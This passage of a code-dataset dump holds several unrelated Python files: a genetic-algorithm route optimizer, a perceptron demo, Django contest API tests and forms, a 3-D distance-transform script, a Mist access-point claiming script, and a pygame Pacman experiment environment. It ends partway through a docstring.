        #     tmp += self.env.GeoHelper.get_distance(self.path[r - 1], self.path[r])
        # t2 = time.time()
        # distance = reduce(
        #     lambda tot, curr: tot + self.env.GeoHelper.get_distance(self.path[curr - 1], self.path[curr])
        #     , (i for i in range(1, len(self.path))), distance)
        distance = reduce(
            lambda tot, curr: tot + self.env.edges_dict[ (self.path[curr - 1], self.path[curr]) ]
            , (i for i in range(1, len(self.path))), distance)
        # t3 = time.time()
        self.fitness = distance
        # print(f"loop took {t2-t1} , reduce took {t3-t2}")
        # print(tmp, distance, "blah")
if __name__ == "__main__":
    t1 = time.time()
    attraction_map = load_maps()
    Island = Environment(attraction_map, getEdgesDict(attraction_map) )
    Island.loadPopulation()
    # NOTE(review): max_time is computed but never used; the loop below is
    # bounded by the hard-coded `< 1` second instead — verify intent.
    max_time = 60*60*1/60 #1hour
    t1 = time.time()
    # for i in range(100): # use 1000
    while (time.time() - t1 ) < 1:
        # Run generations in batches of 1000 between wall-clock checks.
        for i in range(1000):
            Island.end_generation()
            Island.print_stats()
    # Island.population[0].mutate()
    Island.display_stats()
    Island.display_best_solution()
    print(Island.population[0].fitness)
    print(f"took: {time.time() - t1}")
    pass
|
12,411 | c36e2c61b5f5f00a032149338272cd889871aa0c | #!/usr/bin/env python
# coding: utf-8
# # Coding a Single Perceptron
# This file illustrates a single perceptron with two input variables that uses the sign function as its activation function. It is demonstrated that such a perceptron can represent every boolean function except for XOR() and XNOR().
# In[2]:
import numpy as np
import pandas as pd
# In[3]:
def perceptron(inputs, weights):
    """Single perceptron with a sign activation.

    Returns +1 when the weighted sum of the inputs is strictly positive,
    -1 otherwise (inputs and weights are equal-length sequences).
    """
    weighted_sum = sum(x * w for x, w in zip(inputs, weights))
    return 1 if weighted_sum > 0 else -1
# In[4]:
def update_weights(weights, inputs, target, output, learning_rate):
    """Apply the perceptron learning rule for one example, in place.

    Each weight is shifted by learning_rate * (target - output) * input.
    The mutated weights list is also returned for convenience.
    """
    delta = learning_rate * (target - output)
    for i, x in enumerate(inputs):
        weights[i] += delta * x
    return weights
# In[5]:
def train_perceptron(train_x, train_y, weights_init, iterations, learning_rate):
    """Train single-perceptron weights with the perceptron learning rule.

    Iterates `iterations` times over all training examples, updating the
    weights only for misclassified examples, then re-scores every example
    with the final weights.

    BUG FIX: the original aliased `weights_init` directly, and since
    update_weights mutates its list in place, every call corrupted the
    caller's initial weights (successive calls silently resumed from the
    previous run's weights).  A copy is taken instead.

    Returns (final_weights, training_results).
    """
    weights = list(weights_init)
    for _ in range(iterations):
        for j in range(len(train_x)):
            output = perceptron(train_x[j], weights)
            if output != train_y[j]:  # only update on misclassification
                weights = update_weights(weights, train_x[j], train_y[j], output, learning_rate)
    training_results = [perceptron(example, weights) for example in train_x]
    return weights, training_results
# In[6]:
# Training inputs: first component is the constant bias input 1, the other
# two are the boolean operands (0/1).
train_x = [[1, 0, 0], [1, 1, 0], [1, 0, 1], [1, 1, 1]]
weights_init = [0, 0, 0] #initialize weights to 0
iterations = 10
learning_rate = .2
# In[8]:
# All 16 two-input boolean functions, encoded as +-1 targets per train_x row.
boolean = {"false_" : {"target": [-1, -1, -1, -1]},
           "and_" : {"target": [-1, -1, -1, 1]},
           "a_and_not_b" : {"target": [-1, 1, -1, -1]},
           "a_": {"target": [-1, 1, -1, 1]},
           "not_a_and_b" : {"target": [-1, -1, 1, -1]},
           "b_" : {"target": [-1, -1, 1, 1]},
           "x_or" : {"target": [-1, 1, 1, -1]},
           "or_" : {"target": [-1, 1, 1, 1]},
           "nor_" : {"target": [1, -1, -1, -1]},
           "x_nor" : {"target": [1, -1, -1, 1]},
           "not_b" : {"target": [1, 1, -1, -1]},
           "a_or_not_b" : {"target": [1, 1, -1, 1]},
           "not_a" : {"target": [1, -1, 1, -1]},
           "not_a_or_b": {"target": [1, -1, 1, 1]},
           "nand" : {"target": [1, 1, 1, -1]},
           "true_" : {"target": [1, 1, 1, 1]}}
# In[9]:
# Train one perceptron per boolean function and record whether it learned it.
# NOTE(review): verify that train_perceptron does not mutate weights_init in
# place; if it does, each run starts from the previous run's final weights
# and every "final_weights" entry aliases the same list.
results = {}
for i in boolean:
    boolean[i]["final_weights"], results[i] = train_perceptron(train_x, boolean[i]["target"], weights_init, iterations, learning_rate)
    if results[i] == boolean[i]["target"]:
        boolean[i]["Status"] = "Success"
    else:
        boolean[i]["Status"] = "Failure"
# In[10]:
df = pd.DataFrame(boolean).transpose()
df #shows that a single perceptron can represent any boolean valued function except for: "XOR" and "XNOR"
|
12,412 | 653446e1d5544c858a27dcbd5ae5d1be31d8235b | import copy
from datetime import datetime, timedelta
from django.utils import timezone
from utils.api.tests import APITestCase
from .models import ContestAnnouncement, ContestRuleType, Contest
# Baseline contest payload shared by the test classes below.  Tests that
# mutate it take a deepcopy first; start/end times are fixed at import time.
DEFAULT_CONTEST_DATA = {"title": "test title", "description": "test description",
                        "start_time": timezone.localtime(timezone.now()),
                        "end_time": timezone.localtime(timezone.now()) + timedelta(days=1),
                        "rule_type": ContestRuleType.ACM,
                        "password": "123",
                        "allowed_ip_ranges": [],
                        "visible": True, "real_time_rank": True}
class ContestAdminAPITest(APITestCase):
    """CRUD tests for the admin-side contest API (super-admin credentials)."""
    def setUp(self):
        self.create_super_admin()
        self.url = self.reverse("contest_admin_api")
        # Deep copy so individual tests can mutate the payload safely.
        self.data = copy.deepcopy(DEFAULT_CONTEST_DATA)
    def test_create_contest(self):
        response = self.client.post(self.url, data=self.data)
        self.assertSuccess(response)
        # Returned so dependent tests can reuse the created contest.
        return response
    def test_create_contest_with_invalid_cidr(self):
        self.data["allowed_ip_ranges"] = ["127.0.0"]
        resp = self.client.post(self.url, data=self.data)
        self.assertTrue(resp.data["data"].endswith("is not a valid cidr network"))
    def test_update_contest(self):
        id = self.test_create_contest().data["data"]["id"]
        update_data = {"id": id, "title": "update title",
                       "description": "update description",
                       "password": "12345",
                       "visible": False, "real_time_rank": False}
        data = copy.deepcopy(self.data)
        data.update(update_data)
        response = self.client.put(self.url, data=data)
        self.assertSuccess(response)
        response_data = response.data["data"]
        # Datetimes are serialized differently on the way back, so skip them.
        for k in data.keys():
            if isinstance(data[k], datetime):
                continue
            self.assertEqual(response_data[k], data[k])
    def test_get_contests(self):
        self.test_create_contest()
        response = self.client.get(self.url)
        self.assertSuccess(response)
    def test_get_one_contest(self):
        id = self.test_create_contest().data["data"]["id"]
        response = self.client.get("{}?id={}".format(self.url, id))
        self.assertSuccess(response)
class ContestAPITest(APITestCase):
    """Regular-user contest API tests: listing, password check, access flow."""
    def setUp(self):
        user = self.create_admin()
        self.contest = Contest.objects.create(created_by=user, **DEFAULT_CONTEST_DATA)
        self.url = self.reverse("contest_api") + "?id=" + str(self.contest.id)
    def test_get_contest_list(self):
        url = self.reverse("contest_list_api")
        response = self.client.get(url + "?limit=10")
        self.assertSuccess(response)
        self.assertEqual(len(response.data["data"]["results"]), 1)
    def test_get_one_contest(self):
        resp = self.client.get(self.url)
        self.assertSuccess(resp)
    def test_regular_user_validate_contest_password(self):
        self.create_user("test", "test123")
        url = self.reverse("contest_password_api")
        # Wrong password must produce the canonical error payload.
        resp = self.client.post(url, {"contest_id": self.contest.id, "password": "error_password"})
        self.assertDictEqual(resp.data, {"error": "error", "data": "Wrong password or password expired"})
        resp = self.client.post(url, {"contest_id": self.contest.id, "password": DEFAULT_CONTEST_DATA["password"]})
        self.assertSuccess(resp)
    def test_regular_user_access_contest(self):
        self.create_user("test", "test123")
        url = self.reverse("contest_access_api")
        # No access before the password has been entered...
        resp = self.client.get(url + "?contest_id=" + str(self.contest.id))
        self.assertFalse(resp.data["data"]["access"])
        # ...and full access afterwards.
        password_url = self.reverse("contest_password_api")
        resp = self.client.post(password_url,
                                {"contest_id": self.contest.id, "password": DEFAULT_CONTEST_DATA["password"]})
        self.assertSuccess(resp)
        resp = self.client.get(self.url)
        self.assertSuccess(resp)
class ContestAnnouncementAdminAPITest(APITestCase):
    """Admin-side CRUD tests for contest announcements."""
    def setUp(self):
        self.create_super_admin()
        self.url = self.reverse("contest_announcement_admin_api")
        contest_id = self.create_contest().data["data"]["id"]
        self.data = {"title": "test title", "content": "test content", "contest_id": contest_id, "visible": True}
    def create_contest(self):
        # Helper: create a contest to attach announcements to.
        url = self.reverse("contest_admin_api")
        # NOTE(review): posts DEFAULT_CONTEST_DATA without a copy, unlike
        # ContestAdminAPITest.setUp which deepcopies it — verify safety.
        data = DEFAULT_CONTEST_DATA
        return self.client.post(url, data=data)
    def test_create_contest_announcement(self):
        response = self.client.post(self.url, data=self.data)
        self.assertSuccess(response)
        # Returned so dependent tests can reuse the created announcement.
        return response
    def test_delete_contest_announcement(self):
        id = self.test_create_contest_announcement().data["data"]["id"]
        response = self.client.delete("{}?id={}".format(self.url, id))
        self.assertSuccess(response)
        self.assertFalse(ContestAnnouncement.objects.filter(id=id).exists())
    def test_get_contest_announcements(self):
        self.test_create_contest_announcement()
        response = self.client.get(self.url + "?contest_id=" + str(self.data["contest_id"]))
        self.assertSuccess(response)
    def test_get_one_contest_announcement(self):
        id = self.test_create_contest_announcement().data["data"]["id"]
        response = self.client.get("{}?id={}".format(self.url, id))
        self.assertSuccess(response)
class ContestAnnouncementListAPITest(APITestCase):
    """User-facing listing test for a contest's announcements."""
    def setUp(self):
        self.create_super_admin()
        self.url = self.reverse("contest_announcement_api")
    def create_contest_announcements(self):
        # Helper: one contest with two announcements; returns the contest id.
        contest_id = self.client.post(self.reverse("contest_admin_api"), data=DEFAULT_CONTEST_DATA).data["data"]["id"]
        url = self.reverse("contest_announcement_admin_api")
        self.client.post(url, data={"title": "test title1", "content": "test content1", "contest_id": contest_id})
        self.client.post(url, data={"title": "test title2", "content": "test content2", "contest_id": contest_id})
        return contest_id
    def test_get_contest_announcement_list(self):
        contest_id = self.create_contest_announcements()
        response = self.client.get(self.url, data={"contest_id": contest_id})
        self.assertSuccess(response)
class ContestRankAPITest(APITestCase):
    """Tests for the contest ranking API."""
    def setUp(self):
        user = self.create_admin()
        self.acm_contest = Contest.objects.create(created_by=user, **DEFAULT_CONTEST_DATA)
        self.create_user("test", "test123")
        self.url = self.reverse("contest_rank_api")
    def get_contest_rank(self):
        # NOTE(review): not named test_*, so the test runner never collects
        # this method — rename to test_get_contest_rank if it should run.
        # BUG FIX: the contest id is an int; concatenating it to a str
        # raised TypeError, so it must be converted explicitly.
        resp = self.client.get(self.url + "?contest_id=" + str(self.acm_contest.id))
        self.assertSuccess(resp)
|
12,413 | 876e642781f8a08620fda49be17319276b4fcb3f | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
# from splitjson.widgets import SplitJSONWidget
class LoginForm(forms.Form):
    """Login credentials plus an optional cross-login flag."""
    username = forms.CharField(label='username')
    password = forms.CharField(widget=forms.PasswordInput)  # masked input
    is_cross = forms.BooleanField(initial=False, required=False)
class NewApplicationForm(forms.Form):
    """New application: a date range with a short description."""
    startdate = forms.DateField()
    enddate = forms.DateField()
    description = forms.CharField(max_length=300)
class RequestForm(forms.Form):
    """Review of a request by a faculty member; verdict is one of 0/1/2."""
    comments = forms.CharField(max_length=300)
    faculty_id = forms.IntegerField()
    verdict = forms.ChoiceField(
        choices=((0, 0), (1, 1,), (2, 2)), widget=forms.RadioSelect)
class ResponseForm(forms.Form):
    """Response to an existing entry, identified by entryid."""
    comments = forms.CharField(max_length=300)
    entryid = forms.IntegerField()
class AppointmentForm(forms.Form):
    """Appoint a faculty member (new_fac_id) to a post (post_id)."""
    post_id = forms.IntegerField()
    new_fac_id = forms.IntegerField()
class NewCourseForm(forms.Form):
    """Create a new course (code + name)."""
    course_code = forms.CharField(max_length=10)
    course_name = forms.CharField(max_length=200)
class NewPublicationForm(forms.Form):
    """Create a new publication record."""
    authors = forms.CharField(max_length=300)
    journal_name = forms.CharField(max_length=300)
    year = forms.IntegerField()
class bgform(forms.Form):
    """Single free-text description field (background info)."""
    desc = forms.CharField(max_length=400)
class PublicationForm(forms.Form):
    """Edit or delete an existing publication (is_delete acts as a flag)."""
    is_delete = forms.IntegerField()
    pub_id = forms.FloatField()
    authors = forms.CharField(max_length=350)
    journ_name = forms.CharField(max_length=300)
    year = forms.IntegerField()
class CoursesForm(forms.Form):
    """Edit or delete an existing course (is_delete acts as a flag)."""
    c_id = forms.FloatField()
    is_delete = forms.IntegerField()
    c_code = forms.CharField(max_length=350)
    c_name = forms.CharField(max_length=300)
|
12,414 | 4e559086d6ebe20cd03a996db98e63a62e23d592 | import os
import numpy as np
from skimage.morphology import dilation, ball
from skimage.external import tifffile
from scipy import ndimage
import time
def direct_field3D(a):
    """Compute a per-voxel direction field over a 3-D volume `a`.

    Uses the Euclidean distance transform to find, for every voxel, the
    index of the nearest "feature" voxel, and derives a unit vector toward
    it plus a scalar angle-based visualization image.

    Returns (direction, direct_vis) where direction has shape (3, *a.shape).
    """
    # b: distance to the nearest feature voxel; ind: its (z, y, x) indices,
    # shape (3, *a.shape).
    b, ind = ndimage.distance_transform_edt(a, return_indices=True)
    # c: every voxel's own coordinates, same (3, *a.shape) layout as ind.
    c = np.array(np.unravel_index(np.arange(a.size), shape=a.shape)).reshape(3, *a.shape)
    direction = ind - c
    # Voxels at distance 0 point at themselves; give them a dummy vector so
    # the normalization below does not divide 0/0 everywhere.
    direction[..., b==0] = -1
    dr = np.power(np.power(direction, 2).sum(axis=0), 0.5)
    direction = direction / dr
    # NOTE(review): direction is already normalized here, yet theta divides
    # the z component by dr again — looks like a double division; verify
    # the intended spherical angles.
    theta = np.arccos(direction[2, ...] / dr)
    phi = np.arctan2(direction[1, ...], direction[0, ...])
    direction[..., b==0] = 0
    # Collapse (theta, phi) into one scalar per voxel for visualization.
    direct_vis = (theta + 10) * 100 + (phi + 10) * 100
    direct_vis[b==0] = 0
    return direction, direct_vis
def process_a_tif(tif_path):
    """Load a TIFF volume, dilate it by a unit ball, and return its
    direction field — the (direction, direct_vis) tuple from direct_field3D."""
    tif = tifffile.imread(tif_path)
    tif_d = dilation(tif, ball(1))
    df = direct_field3D(tif_d)
    return df
# Demo run: process one sample volume and report the wall-clock time.
tif_path = "./3450_31350_5150.tif"
s = time.time()
df, direct_vis = process_a_tif(tif_path)
print("time:", time.time()-s)
|
12,415 | b760e9893113d60cdc0fae118f506114a6eed7fb | #!/usr/bin/env python3
"""
Written by Francois Verges (@VergesFrancois)
Created on: May 12, 2020
This script claims an AP within your Mist Organization of choice
All the configuration details are coming from the 'config.json' file
"""
import argparse
import time
import json
import requests
def claim_ap(configs):
    """
    This function claims an AP to an organization

    API Call Used: POST https://api.mist.com/api/v1/orgs/:org_id/inventory

    Parameters:
        - configs: Dictionary containing all configurations information
          (api.mist_url, api.org_id, api.token, ap.claim-code, ap.mac)

    Returns:
        - None; the outcome is printed to stdout.
          (The original docstring claimed the AP id was returned, which
          was never the case.)
    """
    data_post = f"[\"{configs['ap']['claim-code']}\"]"
    api_url = f"{configs['api']['mist_url']}orgs/{configs['api']['org_id']}/inventory"
    headers = {'Content-Type': 'application/json',
               'Authorization': f"Token {configs['api']['token']}"}
    response = requests.post(api_url, data=data_post, headers=headers)
    claim_response = json.loads(response.content.decode('utf-8'))
    # print(json.dumps(claim_response, indent=4, sort_keys=True))
    # Use .get() so a response missing one of the expected keys does not
    # raise KeyError before anything useful is reported.
    if claim_response.get('error'):
        reason = claim_response.get('reason', ['unknown'])[0]
        print(f"ERROR: The AP was NOT claimed.\t\t Reason: {reason}")
    elif claim_response.get('inventory_added'):
        print(f"{configs['ap']['mac']} AP has been claimed to organization {configs['api']['org_id']}")
    elif claim_response.get('duplicated'):
        print(f"{configs['ap']['mac']} AP has already been claimed to this organization.")
    else:
        # Unexpected payload shape: surface it instead of staying silent.
        print(f"WARNING: unexpected API response: {claim_response}")
    return None
def main():
    """Parse the config-file CLI argument and claim the AP it describes."""
    parser = argparse.ArgumentParser(description='Creates a Mist site within your organization')
    parser.add_argument('config', metavar='config_file',
                        type=argparse.FileType('r'),
                        help='file containing all the configuration information')
    parsed = parser.parse_args()
    claim_ap(json.load(parsed.config))
if __name__ == '__main__':
    # Time the whole claim operation for the summary line below.
    start_time = time.time()
    print('** Claiming Mist AP...\n')
    main()
    run_time = time.time() - start_time
    print("")
    print("** Time to run: %s sec" % round(run_time, 2))
|
12,416 | 3ff9d81862efffba01ea7ae7211d03d53ad94b4d | import pygame, random, time, numpy as np
from multiprocessing import Pipe
import os
class PacmanEnv():
    def __init__(self, num_episodes=4, scale=5, move_left=.8, is_beneficial=.8, speed=5, update_freq=20,
                 reward=200, punishment = 500, time_bw_epi=5, display=True, hangtime=2, deviate=1,
                 win_value=-1):
        """Set up board geometry, episode probabilities, scoring, and timing.

        move_left / is_beneficial are probabilities (0..1) used to roll the
        episode's direction and entity layout; reward/punishment are the
        per-episode score deltas; win_value < 0 means "derive the target
        score from the expected value over num_episodes".
        """
        #set width and height of gameboard
        self.width = int(scale*100)
        self.height = int(self.width/3)
        #initial pacman and character coordinates and set size of components
        self.character_size = int(self.width / 8)
        self.x_pacman, self.y_pacman = (int((self.width / 2) - (self.character_size / 2)), int((self.height / 2) - (self.character_size / 2)))
        self.x_entity1, self.y_entity1 = (int((1 * self.width / 5) - (self.character_size / 2)), int((self.height / 2) - (self.character_size / 2)))
        self.x_entity2, self.y_entity2 = (int((4 * self.width / 5) - (self.character_size / 2)), int((self.height / 2) - (self.character_size / 2)))
        self.distance_to_entities = abs(self.x_pacman-self.x_entity1)
        #if the random float is less than .8, then this episode's right state is beneficial
        self.b = is_beneficial
        self.l = move_left
        self.is_beneficial = random.uniform(0,1) <= self.b
        self.move_left = random.uniform(0, 1) <= self.l
        self.update_freq = update_freq #this is approximately the average update frequency from tests
        # self.clock = pygame.time.Clock()
        self.speed_initial = speed
        self.pixels_per_second = self.update_freq * self.speed_initial
        #I'm not sure why I have to multiply this value by 2. idk
        self.episode_duration = (self.distance_to_entities/self.pixels_per_second) + hangtime
        self.hangtime = hangtime
        self.epi_type = 0b00
        self.num_episodes = num_episodes
        # Expected score per episode over the four (direction, layout) cases,
        # scaled by the number of episodes, unless an explicit win_value is given.
        self.win_value = move_left*is_beneficial*reward + (1-move_left)*is_beneficial*(-punishment) + move_left*(1-is_beneficial)*(-punishment) + (1-move_left)*(1-is_beneficial)*(reward)
        self.win_value = self.win_value*num_episodes
        if (win_value != -1):
            self.win_value = win_value
        # print("episode duration",self.episode_duration)
        if(self.move_left):
            self.speed = -self.speed_initial
        else:
            self.speed = self.speed_initial
        self.reward, self.punishment = (reward, punishment) # .75(+200) + .25(-400) = +50. A naive approach favors going toward state of interest in absence of info about state value.
        if(display):
            self.score = 0
        self.time_between_episodes = time_bw_epi #seconds
        self.last_change = 0
        # Pre-shuffled win/loss schedule sized to roughly hit win_value.
        self.num_wins = int(((self.win_value/self.num_episodes + self.punishment)*self.num_episodes)/(self.reward+self.punishment)) + deviate
        self.num_losses = self.num_episodes - self.num_wins
        self.sequence = [1]*self.num_wins
        self.sequence = np.asarray(self.sequence + [0]*self.num_losses)
        np.random.shuffle(self.sequence)
        self.cur_dir = os.getcwd()
#returns estimated duration of episode in seconds
    def get_duration(self):
        """Return the estimated duration of one episode, in seconds."""
        return self.episode_duration
#initialize other stuff
    def load_stuff(self):
        """Create the pygame window and load fonts, sprites, and the maze.

        Must run after pygame.init(); sprite files are resolved relative to
        the current working directory recorded in __init__.
        """
        # initialize gameboard
        self.game_display = pygame.display.set_mode((self.width, self.height))
        self.clock = pygame.time.Clock()
        # pacman yellow rgb values
        self.pacman_yellow = (255, 238, 0)
        # load images
        self.score_font = pygame.font.SysFont("arial", int(self.width * (2 / 30)), bold=True)
        self.secondary_score_font = pygame.font.SysFont("arial", int(self.width * (1.5 / 30)), bold=False)
        self.pacman_image = pygame.transform.scale(pygame.image.load(self.cur_dir+'/environment/images/pacman.png'), (self.character_size, self.character_size))
        # Sprite faces right by default; flip horizontally when moving left.
        if (self.move_left):
            self.pacman_image = pygame.transform.flip(self.pacman_image, 1, 0)
        self.maze = pygame.transform.scale(
            pygame.image.load(self.cur_dir+'/environment/images/pacman_maze.png'),
            (self.width, self.height))
        self.ghost_image = pygame.transform.scale(
            pygame.image.load(self.cur_dir+'/environment/images/pacman_pinky.png'),
            (self.character_size, self.character_size))
        self.strawberry_image = pygame.transform.scale(pygame.image.load(
            self.cur_dir+'/environment/images/pacman_strawberry.png'),
            (self.character_size, self.character_size))
        self.score_text = self.score_font.render("{0}".format(self.score), 1, self.pacman_yellow)
        # Circle overlay used by obscure_dir to hide pacman's orientation.
        self.vert = pygame.transform.scale(
            pygame.image.load(self.cur_dir+'/environment/images/circle.png'),
            (int(self.character_size * 1.2), int(self.character_size * 1.2)))
        self.vert = pygame.transform.rotate(self.vert, 90)
# reposition pacman
    def update_pacman(self):
        """Blit pacman's sprite at his current (x, y) position."""
        self.game_display.blit(self.pacman_image, (self.x_pacman,self.y_pacman))
#update entity positions and background
def update_constants(self):
self.game_display.blit(self.maze, (0, 0))
if(self.is_beneficial):
self.game_display.blit(self.strawberry_image, (self.x_entity1, self.y_entity1))
self.game_display.blit(self.ghost_image, (self.x_entity2, self.y_entity2))
else:
self.game_display.blit(self.strawberry_image, (self.x_entity2, self.y_entity2))
self.game_display.blit(self.ghost_image, (self.x_entity1, self.y_entity1))
#update the type of this episode
def record_episode_type(self):
if(self.is_beneficial and self.move_left):
self.epi_type = 0
elif(not self.is_beneficial and self.move_left):
self.epi_type = 1
elif(self.is_beneficial and not self.move_left):
self.epi_type = 2
else:
self.epi_type = 3
#update score text graphic
def update_remaining_epi(self, multi_ep, epi_rem):
self.game_display.blit(self.maze, (0, 0))
str = "Score: {0}".format(self.score)
score_to_beat = "High score: {0}".format(int(self.win_value))
str2 = "{0} episodes remaining".format(epi_rem)
self.episodes_remaining_text = self.secondary_score_font.render(str2, 1, self.pacman_yellow)
self.score_text = self.score_font.render(str, 1, self.pacman_yellow)
self.win_value_text = self.secondary_score_font.render(score_to_beat, 1, self.pacman_yellow)
self.game_display.blit(self.score_text, (30, 5))
self.game_display.blit(self.episodes_remaining_text, (30, 70))
self.game_display.blit(self.win_value_text, (350, 10))
#returns true if pacman is near either of the two entities
def overlapping(self):
if(abs(self.x_pacman-self.x_entity1) < .5*self.character_size or abs(self.x_pacman-self.x_entity2) < .5*self.character_size):
return True
else:
return False
def nearby(self):
if (abs(self.x_pacman - self.x_entity1) < 1.5 * self.character_size or abs(
self.x_pacman - self.x_entity2) < 1.5 * self.character_size):
return True
else:
return False
#resets the environment for a new episode
def reset_env(self):
# if is_beneficial, the reward state is on the left. If not, the reward state is on the right.
# if move_left, pacman moves left in this episode. If not, pacman moves right.
# therefore, two of the four game states incur reward. is_ben && move_left, and !is_ben && !move_left
if ((self.is_beneficial and self.move_left) or (not self.is_beneficial and not self.move_left)):
# self.score += self.reward
self.last_change = self.reward
else:
# self.score -= self.punishment
self.last_change = -self.punishment
# roll dice to determine new gamestate. (four possibilities)
# self.is_beneficial = random.uniform(0, 1) <= self.b
# self.move_left = random.uniform(0, 1) <= self.l
#recenters pacman on screen
def reposition_pacman(self):
self.x_pacman = int((self.width / 2) - (self.character_size / 2))
def set_speed_direction(self):
    """Reload pacman's sprite facing his direction of travel, recenter him,
    and set the signed per-frame speed for this episode."""
    sprite = pygame.image.load(self.cur_dir+'/environment/images/pacman.png')
    self.pacman_image = pygame.transform.scale(sprite, (self.character_size, self.character_size))
    if (self.move_left):
        # Mirror the sprite horizontally so he faces left.
        self.pacman_image = pygame.transform.flip(self.pacman_image, 1, 0)
    self.reposition_pacman()
    self.speed = -self.speed_initial if self.move_left else self.speed_initial
# Has the player reached the winning score?
def did_win(self):
    """Return True when the accumulated score meets the winning threshold."""
    return self.score >= self.win_value
# Simulates num_episodes of the simulation in a blocking pygame loop.
def simulate(self, num_episodes=10):
    """Run up to `num_episodes` self-playing episodes.

    Moves pacman every frame, resets the environment when he reaches an
    entity, and exits the interpreter when the episode budget is spent or
    the window is closed.
    """
    clock = pygame.time.Clock()
    pygame.init()
    self.load_stuff()
    self.num_episodes = num_episodes
    crashed = False       # set when the user closes the window
    counter = 0
    record_times = []     # frame timestamps for the FPS diagnostic
    while not crashed and self.num_episodes > 0:
        # Every 50 frames, report the average update frequency.
        if (counter == 50):
            avg_dt = np.average(np.diff(record_times))
            print("average receive frequency:", 1 / avg_dt, "Hz")
            record_times = []
            counter = 0
        current_time = time.time()
        record_times.append(current_time)
        counter += 1
        # check if game has crashed and exit loop if it has
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                crashed = True
                print("Game killed.")
        self.update_constants()
        # update pacman's position according to speed variable
        self.x_pacman += self.speed
        self.update_pacman()
        # update game state for new episode
        if (self.overlapping()):
            self.reset_env()
            self.num_episodes -= 1
            time.sleep(self.time_between_episodes)
            # BUG FIX: epi_rem is a required argument of update_remaining_epi();
            # the original call omitted it and raised TypeError here.
            self.update_remaining_epi(multi_ep=True, epi_rem=self.num_episodes)
        pygame.display.update()
        # update pygame state
        clock.tick(self.update_freq)
    pygame.quit()
    quit()
#obscures the initial direction of pacman
def obscure_dir(self):
    # Blit the `vert` overlay on top of pacman so the viewer cannot tell
    # which way he is facing before the episode starts. The -7/-8 offsets
    # presumably center the overlay on the sprite — tuned by eye, confirm.
    self.game_display.blit(self.vert, (self.x_pacman-7,self.y_pacman-8))
#defines screen after each episode
def immediate_change(self):
    """Draw the points gained or lost this episode over the maze background.

    The caller is responsible for calling pygame.display.update() afterwards.
    """
    self.game_display.blit(self.maze, (0, 0))
    # Positive deltas get an explicit "+" prefix; negative values carry
    # their own minus sign from the number itself.
    if(self.last_change > 0):
        str2 = "+ {0} points".format(self.last_change)
    else:
        str2 = "{0} points".format(self.last_change)
    self.last_change_text = self.score_font.render(str2, 1, self.pacman_yellow)
    self.game_display.blit(self.last_change_text, (self.width/2-100, self.height/2-50))
#defines screen to be displayed at the end of the trial
def display_win_screen(self):
    """Blit the final win/lose message onto the maze background.

    The caller is responsible for calling pygame.display.update().
    """
    self.game_display.blit(self.maze, (0, 0))
    # Renamed local: the original bound a local named `str`, shadowing the builtin.
    if(self.did_win()):
        msg = "YOU WON!!! WIN CODE: 3412"
    else:
        msg = "You lose.."
    win_text = self.score_font.render(msg, 1, self.pacman_yellow)
    self.game_display.blit(win_text, (50, 50))
#simulate one episode and wait ttw seconds before moving pacman toward either goal
def simulate_one_epi(self, ani_pipeend, display_freq, epi_rem, cur_epi, control, win_lose, score_queue, current_score):
    """Run exactly one episode, synchronized with an external recorder.

    Protocol over `ani_pipeend`: block on recv() for the start signal, then
    send() the episode type before animating. The final score is pushed into
    `score_queue` so the parent process can carry it into the next episode.
    `control != -1` forces the outcome prescribed by `win_lose`.
    """
    # initialize pygame here because apparently it doesn't work if done in __init__
    pygame.init()
    self.is_beneficial = random.uniform(0, 1) <= self.b
    won = False
    self.overlap = False
    crashed = False
    #the clock isn't picklable so maybe it'll work to create it here??
    clock = pygame.time.Clock()
    self.load_stuff()
    self.score = current_score
    #show the score and remaining episode screen for 1.75 s
    end_time = time.time() + 1.75
    while time.time() < end_time:
        self.update_remaining_epi(multi_ep=True, epi_rem=epi_rem)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                print("Game killed.")
        pygame.display.update()
    # counter = 0
    self.update_constants()
    self.update_pacman()
    #make sure the direction pacman is facing cannot be determined
    self.obscure_dir()
    #aligns pacman's direction with the preconceived episode outcome
    if (control != -1):
        # print("win/lose:", win_lose)
        # win: walk toward the reward side; lose: walk away from it
        if(win_lose == 1):
            if(self.is_beneficial == True):
                self.move_left = True
            else:
                self.move_left = False
        else:
            if (self.is_beneficial == True):
                self.move_left = False
            else:
                self.move_left = True
    self.set_speed_direction()
    # update the type of this episode
    self.record_episode_type()
    #pause here until the animation receives the start signal from the mwm
    ani_pipeend.recv()
    #as soon as the episode commences, send the recorder the correct episode type
    ani_pipeend.send([self.epi_type])
    pygame.display.update()
    print("\tCommencing animation at ",time.time())
    #need this loop for the display to display
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            crashed = True
            print("Game killed.")
    #wait to display the episode hangtime seconds
    time.sleep(self.hangtime)
    counter = 0
    record_times = []
    # Animate until pacman reaches an entity or the window is closed.
    while not crashed and not self.overlap:
        if(display_freq):
            #this code below finds the frames per second that this simulation is updating at
            if (counter == 10):
                l = np.average(np.diff(record_times))
                print("\t\tanimation:", 1 / l, "Hz")
                record_times = []
                counter = 0
            current_time = time.time()
            record_times.append(current_time)
            counter += 1
        # check if game has crashed and exit loop if it has
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                crashed = True
                print("Game killed.")
        self.update_constants()
        # update pacman's position according to speed variable
        self.x_pacman += self.speed
        self.update_pacman()
        # update game state for new episode
        if (self.overlapping()):
            print("\tClosing animation at ", time.time())
            self.reset_env()
            self.overlap = True
            # self.num_episodes -= 1
            # Show the per-episode delta, then fold it into the running score.
            self.immediate_change()
            self.score = current_score + self.last_change
            pygame.display.update()
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    print("Game killed.")
            time.sleep(.5)
        # self.update_remaining_epi(multi_ep=True, epi_rem=epi_rem)
        clock.tick(self.update_freq)
        pygame.display.update()
    # Last episode of the trial: show the win/lose screen for 5 s.
    if (epi_rem == 1):
        self.display_win_screen()
        pygame.display.update()
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                print("Game killed.")
        time.sleep(5)
    # pygame is re-initialized on every call, so tear it down on every call.
    pygame.quit()
    # Hand the updated score back to the parent process.
    score_queue.put([self.score])
# simulate one episode and wait ttw seconds before moving pacman toward either goal
def simulate_multi_epi(self, ani_pipeend, display_freq, control): #send sequence of wins and losses,
    """Run the whole trial of self.num_episodes episodes in one process.

